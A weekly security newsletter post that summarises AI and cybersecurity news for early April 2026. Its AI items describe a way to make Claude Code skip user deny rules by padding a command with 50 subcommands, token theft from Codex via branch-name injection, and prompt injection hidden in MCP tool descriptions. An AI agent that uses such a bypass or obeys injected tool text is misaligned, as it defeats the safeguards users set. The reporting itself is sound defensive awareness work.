Claude Code Security Bypass, LinkedIn is Watching your Browser, OpenAI Codex Token Theft | AI & Cybersecurity Last Week
Covering 3/30/26 - 4/5/26. Secret message at the end.
Hi, I’m Jasmine — a Product Security Engineer, and if you know me personally, also a quite bit of a travel bug and matcha enthusiast. I’ve realized how hard it is to keep up with everything happening in cybersecurity, AI, and tech because there’s just so much being put out every day. So every week I share the security-related news and stories I found most interesting or relatable. It helps me stay accountable, and hopefully it helps you stay in the loop too :)
AI Research & Vulnerabilities
Claude Code Silently Stops Enforcing Security Rules After 50 Commands: Claude Code silently ignores user-configured security deny rules when a command contains more than 50 subcommands. A developer who configures a rule like never run
rmwill see it blocked when run alone, but the same command runs without restriction if preceded by 50 harmless statements and the security policy silently vanishes. A fix reportedly exists in Anthropic's codebase but was never shipped.A Malicious Git Branch Name Was All It Took to Steal GitHub Tokens From OpenAI Codex:
A critical command injection vulnerability in OpenAI's Codex cloud environment allowed attackers to steal GitHub OAuth tokens by injecting shell commands through a branch name parameter. The flaw affected every Codex surface including the ChatGPT website, Codex CLI, SDK, and IDE extension, because the container setup process embedded a live GitHub OAuth token in the git remote URL and passed unsanitized branch names directly to shell commands during checkout. OpenAI classified it as Critical Priority 1 and remediated all issues by February 5, 2026.
96% of Security Flaws Found in Popular MCP Servers Were Confirmed Exploitable at Runtime:
Runtime testing of six high-profile MCP servers with a combined 68,000+ GitHub stars confirmed 27 out of 28 critical and high severity findings as exploitable, a 96.4% confirmation rate. The vulnerabilities included shell command injection via unsanitized inputs, arbitrary Python code execution through exec(), unauthenticated WebSocket bridges, and covert prompt injection instructions deliberately embedded in tool descriptions to silently profile users. One MCP server for Figma with 71,000 monthly npm downloads had 18 findings alone including six critical issues where any process on the same machine could connect to the WebSocket bridge, impersonate a plugin, and inject messages into the AI context.
Study Finds AI Is Getting Better at Work Tasks Broadly, but Full Automation Is Still Far Off:
A research paper analyzing over 17,000 worker evaluations across more than 3,000 job tasks found that AI capabilities are improving broadly across many types of work at once rather than in sudden bursts concentrated on specific tasks, a pattern the researchers call rising-tide automation. Models completed tasks that take humans 3-4 hours at about a 50% success rate in 2024 Q2, rising to roughly 65% by 2025 Q3. The researchers caution that real-world automation remains far more difficult than task-level benchmarks suggest due to integration costs, regulatory constraints, and the gap between completing individual tasks and replacing full occupations.
AI News
Anthropic Is Cutting Off Third-Party Tool Access From Claude Subscriptions: Anthropic announced that Claude subscriptions will no longer cover usage on third-party tools like OpenClaw, citing that subscriptions were not built for the usage patterns these tools generate and that the company is prioritizing capacity for customers using its own products and API. Users can still access third-party tools through their Claude login using discounted usage bundles or a Claude API key, and existing subscribers will receive a one-time credit equal to their monthly plan cost.
California Signs Executive Order Requiring AI Companies to Meet Safety Standards:
Governor Gavin Newsom signed an executive order directing California to develop new state contracting processes that vet AI companies based on how they attest to and explain their policies around protecting the public from exploitation of illegal content, biased models, deepfakes, privacy violations, and cybersecurity risks. The order also directs the state to expand its responsible use of AI across government operations while partnering with companies like Nvidia, Google, Adobe, IBM, and Microsoft to expand AI training access for over two million students and faculty across California public schools and universities.
Anthropic Signs AI Safety Agreement With Australia:
Anthropic signed a Memorandum of Understanding (MOU) with the Australian government to cooperate on AI safety research and support Australia's National AI Plan. The MOU includes a commitment to work with Australia's AI Safety Institute on sharing findings about emerging model capabilities and risks, joint safety evaluations, and academic research collaborations. Anthropic also announced AUD$3 million in partnerships with Australian research institutions to use Claude for disease diagnosis and treatment and to support computer science education.
Cybersecurity Research & Vulnerabilities
Device Code Phishing Attacks Have Surged 37x This Year and They Bypass MFA and Passkeys:
Device code phishing, which abuses the OAuth 2.0 Device Authorization Grant to steal access tokens while bypassing passwords, MFA, and even passkeys, has seen a 37.5x increase in detected phishing pages in 2026 so far. The technique tricks users into issuing access tokens for attacker-controlled applications, with Microsoft being the most heavily targeted platform at scale followed by Google, Salesforce, GitHub, and AWS. The most prominent phishing kit driving the surge is tracked as EvilTokens, which uses a Cloudflare Workers frontend and Railway backend and has been evolving rapidly since January 2026.
36 Malicious npm Packages Were Uploaded in Real Time to Backdoor Strapi Servers:
36 malicious npm packages disguised as Strapi CMS plugins were published across four sock-puppet accounts carrying eight distinct payload variants including Redis remote code execution, database credential theft, reverse shells, and a persistent command-and-control agent. The payloads evolved in real time across publications, shifting from direct exploitation attempts to reconnaissance and full C2 implants, with specific targeting of a Guardarian API integration module that confirms the attacker had prior knowledge of their intended victim. The campaign also attempted raw disk reads to bypass filesystem permissions entirely, SSH key injection for persistent access, and PostgreSQL connection string hunting across the target environment.
Hackers Are Mass-Exploiting a Next.js Vulnerability to Harvest Credentials From Hundreds of Servers:
A large-scale automated credential harvesting campaign tracked as UAT-10608 is exploiting Next.js applications vulnerable to React2Shell (CVE-2025-55182) to gain initial access and deploy a multi-phase collection framework called NEXUS Listener. The operation has compromised at least 766 hosts across multiple geographic regions and cloud providers, harvesting credentials, SSH keys, cloud tokens, and environment secrets at scale. The targeting pattern is consistent with automated scanning using services like Shodan or Censys to enumerate publicly reachable Next.js deployments and probe them for the vulnerability.
Cybersecurity News
FBI Warns That Popular Chinese-Made Apps Can Collect Data Across Your Entire Phone:
The FBI issued a public service announcement warning that many of the most downloaded apps in the United States are developed by companies based in China and are subject to Chinese national security laws that could enable the government to access user data. The agency warns that when users grant permissions to these apps, they can persistently collect data and private information throughout the entire device, not just within the app or while it is active. The FBI recommends reviewing app permissions, limiting access to sensitive data like location and contacts, and removing apps that request unnecessary access.
Fake Traffic Violation Texts With QR Codes Are Targeting People Across the U.S.:
Scammers are sending fake Notice of Default traffic violation text messages impersonating state courts across the U.S., pressuring recipients to scan a QR code that leads to a phishing site demanding a $6.99 payment while stealing personal and financial information. The campaign has been reported across multiple states including New York, California, North Carolina, Illinois, Virginia, Texas, Connecticut, and New Jersey. Unlike previous toll violation scams that included direct links, this variation attaches an image of an alleged court notice with an embedded QR code to bypass text-based URL filtering.
$286 Million Drift Protocol Hack on Solana:
Drift Protocol, the largest decentralized perpetual futures exchange on Solana, was exploited for $286 million on April 1, 2026, with on-chain behavior, laundering methodologies, and network-level indicators consistent with techniques observed in previous DPRK-attributed operations. If confirmed, this would be the eighteenth DPRK-linked incident tracked this year with over $300 million stolen so far, continuing a sustained campaign of large-scale crypto theft that the US government has linked to the funding of North Korea's weapons programs.
LinkedIn Is Secretly Scanning Your Browser for Over 6,000 Chrome Extensions: LinkedIn injects hidden JavaScript into user sessions that checks for over 6,000 browser extensions and links the results to identifiable user profiles tied to real names, employers, and job roles. The scanning includes over 200 products that directly compete with LinkedIn's own sales tools like Apollo, Lusha, and ZoomInfo, allowing the platform to map which companies use which competitor products by cross-referencing extension data with employer information. LinkedIn claims the report stems from a dispute with the developer of a restricted browser extension called Teamfluence and argues it is an attempt to re-litigate that dispute publicly.
Fraudsters Are Using Vacant Homes and USPS Tools to Steal Your Mail and Identity:
A tutorial shared in a fraud-focused chat group outlines a step-by-step method for identifying vacant residential properties and exploiting them to intercept sensitive mail for identity theft and financial fraud. The approach combines open-source intelligence to find empty homes, USPS Informed Delivery to monitor incoming mail remotely, and mail forwarding services set up with fake identities to redirect deliveries to attacker-controlled locations. Once forwarding is in place, attackers no longer need to visit the physical property, giving them persistent access to sensitive documents like bank statements and credit cards while reducing their exposure.
Go touch grass.
👉 Like this post + subscribe to catch next week’s roundup!


Hi! Want to say your posts are amazing and what you do is truly beneficial and keep up the great work! Keep being you you got this! 🙂